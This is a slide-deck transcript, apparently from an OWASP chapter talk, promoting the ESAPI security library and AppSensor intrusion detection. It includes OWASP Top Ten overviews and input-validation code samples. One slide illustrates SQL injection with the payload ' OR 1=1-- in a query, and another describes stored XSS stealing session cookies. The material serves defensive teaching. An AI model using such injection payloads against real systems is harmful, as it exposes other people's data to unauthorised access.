490 likes | 772 Views
Protecting Web Applications with ESAPI and AppSensor Manuel Lopez Arredondo manuel.lopez@owasp.org. “The cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine”|.
E N D
Protecting Web Applicationswith ESAPI and AppSensorManuel Lopez Arredondomanuel.lopez@owasp.org
“The cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine”| http://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking http://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/
Why Security isimportant? Ponemon Institute. (2012). 2012 Cost of Cyber Crime Study:.PonemonInstitute LLC.
Why Security isimportant? Verizon. (2012). 2012 Data BREACH Investigations Report:.VerizonLLC.
What is OWASP Mission Driven Nonprofit | World Wide | Unbiased OWASP does not endorse or recommend commercial products or services
What is OWASP Community Driven 30,000 Mail List Participants 200 Active Chapters in 70 countries 1600+ Members, 56 Corporate Supporters 69 Academic Supporters
OWASP Guadalajara Chapter What do we have to offer? Community of security professional Monthly meetings Mailing List Presentations Workshops Open forums for discussion Vendor neutral environments March 2012 – Till Date https://www.owasp.org/index.php/Guadalajara
What is OWASP Quality Resources 200+ Projects 15,000+ downloads of tools, documentation 250,000+ unique visitors 800,000+ page views (monthly)
Quality Resources Tools Code 40% 10% 50% Documentation
OWASP Top Ten (2010 Edition) A4: Insecure Direct Object References • A1: Injection • A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management A5: Cross Site Request Forgery (CSRF) A6: Security Misconfiguration A7: Failure to Restrict URL Access • A8: Insecure Cryptographic Storage • A9: Insufficient Transport Layer Protection A10: Unvalidated Redirects and Forwards
Account: SKU: Account: SKU: SQL Injection – Illustrated "SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’" Account Summary Acct:5424-6066-2134-4334 Acct:4128-7574-3921-0192 Acct:5424-9383-2039-4029 Acct:4128-0004-1234-0293 DB Table HTTP response SQL query HTTP request Finance Transactions Accounts Administration Communication Knowledge Mgmt E-Commerce Bus. Functions Databases Legacy Systems Web Services Directories Billing Human Resrcs Application Layer APPLICATIONATTACK Custom Code 1. Application presents a form to the attacker 2. Attacker sends an attack in the form data App Server 3. Application forwards attack to the database in a SQL query Web Server Hardened OS 4. Database runs query containing attack and sends encrypted results back to application Network Layer Firewall Firewall 5. Application decrypts data as normal and sends results to the user
Finance Transactions Accounts Administration Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code Cross-Site Scripting Illustrated 1 Attacker sets the trap – update my profile Application with stored XSS vulnerability Attacker enters a malicious script into a web page that stores the data on the server 2 Victim views page – sees attacker profile Script runs inside victim’s browser with full access to the DOM and cookies 3 Script silently sends attacker Victim’s session cookie
Enterprise Security API Project Leader: Chris Schmidt, Chris.Schmidt@owasp.org Purpose: Afree, open source, web application security control library that makes it easier for programmers to write lower-risk applications https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API for Reboot
ESAPI - Vision • Build a common set of security controls for today's most popular programming languages. • Have interfaces in common across programming languages as much as possible and natural. • Provide at least a simple reference implementation for each security control to serve as example if not useful in itself. • Easily extensible • Provide functionality that is most often needed, but lacking (or inconsistent) in various frameworks / languages.
Using ESAPI (1 of 3) • Getting started • https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API • Download: http://code.google.com/p/owasp-esapi-java/ • ESAPI Cheat Sheet: https://www.owasp.org/index.php/ESAPI_Cheat_Sheet • ESAPI Swingset: http://code.google.com/p/owasp-esapi-java-swingset/
Using ESAPI (2 of 3) • Getting help • ESAPI User mailing list (focuses on Java version): https://lists.owasp.org/mailman/listinfo/esapi-user • ESAPI Developer mailing list: https://lists.owasp.org/mailman/listinfo/esapi-dev • ESAPI Project page: http://www.esapi.org/ (coming soon)
Using ESAPI (3 of 3) • Getting involved • Many other language implementations, all playing catch up • ESAPI for Java version needs help with user documentation • ESAPI 2.1 (Java) starting soon • ESAPI Swingset and Swingset Interactive → Port to use ESAPI 2.0
Enterprise Security API Existing Enterprise Security Services/Libraries
Basic ESAPI Approach – Examples • In Java: String input = request.getParameter( "input" ); // Throws ValidationException or IntrusionException // if problem String cleaned = ESAPI.validator().getValidInput("Secure input example", input, "SafeString", // regex spec 200, // max lengyh false,// no nulls true); // canonicalize String safeHTML = ESAPI.encoder().encoderForHTML(cleaned);
Basic ESAPI Approach – Examples • In PHP: $cleanTmp = array(); // local in scope $cleanParams = array(); // local in scope $cleanTmp['username'] = ESAPI::getValidator()->getValidInput( "Secure input example", $input, "SafeString", 200, false, true); $cleanParams['username'] = ESAPI::getEncoder()->encodeForHTML($cleanTmp['username']);
OWASP ESAPI Project ScorecardFeature Set vs. Programming Language
Source Code and JavadocOnline Now! http://code.google.com/p/owasp-esapi-java
AppSensor Project Leader(s): Michael Coates, John Melton, Colin Watson Purpose: Defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. Release: AppSensor 0.1.3 - Nov 2010 (Tool) & September 2008 (doc) https://www.owasp.org/index.php/AppSensor Create attack aware applications
Detecting Attacks the Right Way • Detect INSIDE the Application • Automatic Detection • Comprehensive • Minimize False Positives • Understand Business Logic • Immediate Response • No Manual Efforts Required
Implementing AppSensor Detection Points Application Log Server AppSensor Brain Response Listener
Takeaways • Open Source solutions • Low cost and low effort • Think out of the box for development teams • Techniques used on the Industry • OWASP Google Summer of Code 2013 https://www.owasp.org/index.php/GSoC
About OWASP • Online since December 1st 2001 • Not-for-profit charitable organization • OPEN Everything at OWASP is radically transparent from our finances to our code. • INNOVATION OWASP encourages and supports innovation/experiments for solutions to software security challenges. • GLOBAL Anyone around the world is encouraged to participate in the OWASP community. • INTEGRITY OWASP is an honest and truthful, vendor agnostic, global community. • https://www.owasp.org/index.php
OWASP Guadalajara Chapter What do we have to offer? Community of security professional Monthly meetings Mailing List Presentations Workshops Open forums for discussion Vendor neutral environments March 2012 – Till Date https://www.owasp.org/index.php/Guadalajara
Application Developers • New attacks/ defense guideline • Cheat Sheets • Web Goat-emulator-designed to teach web application security lessons
Application Testers and Quality Assurance Testing guide Penetration testing tools Application Security Verification Standard Project
OWASP Testing Framework 4. Web Application Penetration Testing • 4.2 Information Gathering • 4.3 Configuration Management Testing • 4.4 Business logic testing • 4.5 Authentication Testing • 4.6 Authorization Testing • 4.7 Session Management Testing • 4.8 Data Validation Testing • 4.9 Testing for Denial of Service • 4.10 Web Services Testing • 4.11 Ajax Testing http://www.owasp.org/index.php/OWASP_Testing_Guide_v3_Table_of_Contents
Application Project Management and Staff Define the process SDLC Code Review Code review tool http://codecrawler.codeplex.com/Release/ProjectReleases.aspx http://orizon.sourceforge.net
Download Get OWASP Books
Business advantages of being associated with OWASP • The main benefit of becoming an OWASP corporate supporter is to demonstrate the organization's belief that application security is important and that the organization is working to take necessary steps to properly address application security risk in their businesses • The organization itself gets security benefit at reduced costs • Security code review tools are free • Lots of open & free security testing tools • Security guidelines & best practices • Opportunity to endorse organization's logo in OWASP events, conferences, & website • The organization gets listed as a sponsor in the newsletter that goes to over 20,000 individuals around the world on owasp mailing lists and linked 'in group • If you are looking to expand your business in emerging market here is an opportunity to reach out • When organization becomes a supporter of a security community it helps employees, partners, suppliers and customers to understand the value & importance of security, and improves application security throughout the whole supply chain • Membership options : https://www.owasp.org/index.php/Membership
Join Us ! Subscribe mailing list https://www.owasp.org/index.php/Guadalajara Chapter Leaders: Eduardo Cerna Mauel Lopez
App Sensor Design AppSensor “Brain” Demo App App Logs Embedded AppSensor Response